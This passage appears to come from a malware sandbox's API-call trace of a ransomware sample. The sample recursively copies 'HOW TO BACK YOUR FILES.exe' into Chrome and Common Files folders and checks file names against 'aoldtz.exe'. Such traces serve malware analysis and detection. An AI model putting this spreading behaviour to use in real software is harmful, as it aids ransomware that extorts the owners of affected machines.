cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.610] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.610] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.610] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales" [0056.610] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d1ea0 | out: hHeap=0x2b0000) returned 1 [0056.610] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b28 | out: hHeap=0x2b0000) returned 1 [0056.610] lstrlenW (lpString="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales") returned 70 [0056.610] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales" [0056.610] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.610] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\locales\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.617] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.617] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53401120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53401120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.617] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.617] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.618] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer" [0056.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335108 | out: hHeap=0x2b0000) returned 1 [0056.618] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b08 | out: hHeap=0x2b0000) returned 1 [0056.618] lstrlenW (lpString="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer") returned 72 [0056.618] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer" [0056.619] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.619] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\installer\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.623] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.623] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53401120, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53401120, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.624] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.624] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.624] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions" [0056.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x335068 | out: hHeap=0x2b0000) returned 1 [0056.624] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0056.624] lstrlenW (lpString="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions") returned 73 [0056.624] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions" [0056.624] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.624] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\extensions\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.629] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.629] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Extensions\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53427280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53427280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.629] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.629] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.629] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps" [0056.629] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x334fc8 | out: hHeap=0x2b0000) returned 1 [0056.629] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ac8 | out: hHeap=0x2b0000) returned 1 [0056.629] lstrlenW (lpString="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps") returned 75 [0056.629] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps" | out: lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps") returned="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps" [0056.629] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.629] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\google\\chrome\\application\\58.0.3029.110\\default_apps\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.635] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.635] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\default_apps\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d78b680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x53427280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53427280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.635] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.635] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.636] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files") returned="C:\\Program Files (x86)\\Common Files" [0056.636] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee920 | out: hHeap=0x2b0000) returned 1 [0056.636] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7aa8 | out: hHeap=0x2b0000) returned 1 [0056.636] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files") returned 35 [0056.636] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files" | out: lpString1="C:\\Program Files (x86)\\Common Files") returned="C:\\Program Files (x86)\\Common Files" [0056.636] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.636] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.641] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.641] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x53427280, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53427280, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.641] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.641] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.641] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\System", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\System") returned="C:\\Program Files (x86)\\Common Files\\System" [0056.641] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2df7d0 | out: hHeap=0x2b0000) returned 1 [0056.641] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0056.641] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\System") returned 42 [0056.641] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\System" | out: lpString1="C:\\Program Files (x86)\\Common Files\\System") returned="C:\\Program Files (x86)\\Common Files\\System" [0056.641] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.641] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\system\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.648] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.648] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5344d3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5344d3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.648] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.648] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.648] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\System\\Ole DB", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB") returned="C:\\Program Files (x86)\\Common Files\\System\\Ole DB" [0056.648] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d36d8 | out: hHeap=0x2b0000) returned 1 [0056.648] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0056.648] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\System\\Ole DB") returned 49 [0056.648] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\System\\Ole DB" | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB") returned="C:\\Program Files (x86)\\Common Files\\System\\Ole DB" [0056.648] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.648] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.654] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.654] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5344d3e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5344d3e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.655] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.655] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.655] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US") returned="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US" [0056.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d36d8 | out: hHeap=0x2b0000) returned 1 [0056.655] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ca8 | out: hHeap=0x2b0000) returned 1 [0056.655] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US") returned 55 [0056.655] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US" | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US") returned="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US" [0056.655] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.655] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\system\\ole db\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.661] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.661] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\Ole DB\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea1accb, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x53473540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53473540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.661] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.661] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.662] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\System\\msadc", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\msadc") returned="C:\\Program Files (x86)\\Common Files\\System\\msadc" [0056.662] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8f28 | out: hHeap=0x2b0000) returned 1 [0056.662] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0056.662] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\System\\msadc") returned 48 [0056.662] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\System\\msadc" | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\msadc") returned="C:\\Program Files (x86)\\Common Files\\System\\msadc" [0056.662] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.662] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.668] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.668] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x53473540, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x53473540, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.668] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.668] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.669] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US") returned="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US" [0056.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8f28 | out: hHeap=0x2b0000) returned 1 [0056.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0056.669] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US") returned 54 [0056.669] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US" | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US") returned="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US" [0056.669] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.669] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\system\\msadc\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.677] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.677] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\msadc\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x534996a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x534996a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.678] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.678] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.678] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\System\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\en-US") returned="C:\\Program Files (x86)\\Common Files\\System\\en-US" [0056.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8eb8 | out: hHeap=0x2b0000) returned 1 [0056.678] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b68 | out: hHeap=0x2b0000) returned 1 [0056.678] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\System\\en-US") returned 48 [0056.678] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\System\\en-US" | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\en-US") returned="C:\\Program Files (x86)\\Common Files\\System\\en-US" [0056.678] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.678] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\system\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.683] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.683] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ea40f84, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x534996a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x534996a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccda8 [0056.683] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0056.683] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0056.683] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files (x86)\\Common Files\\System\\ado", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\ado") returned="C:\\Program Files (x86)\\Common Files\\System\\ado" [0056.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f2098 | out: hHeap=0x2b0000) returned 1 [0056.683] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b48 | out: hHeap=0x2b0000) returned 1 [0056.683] lstrlenW (lpString="C:\\Program Files (x86)\\Common Files\\System\\ado") returned 46 [0056.683] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Common Files\\System\\ado" | out: lpString1="C:\\Program Files (x86)\\Common Files\\System\\ado") returned="C:\\Program Files (x86)\\Common Files\\System\\ado" [0056.683] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0056.683] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\common files\\system\\ado\\how to back your files.exe"), bFailIfExists=1) returned 1 [0056.689] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0056.689] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\System\\ado\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8f7490, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x534bf800, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x534bf800, 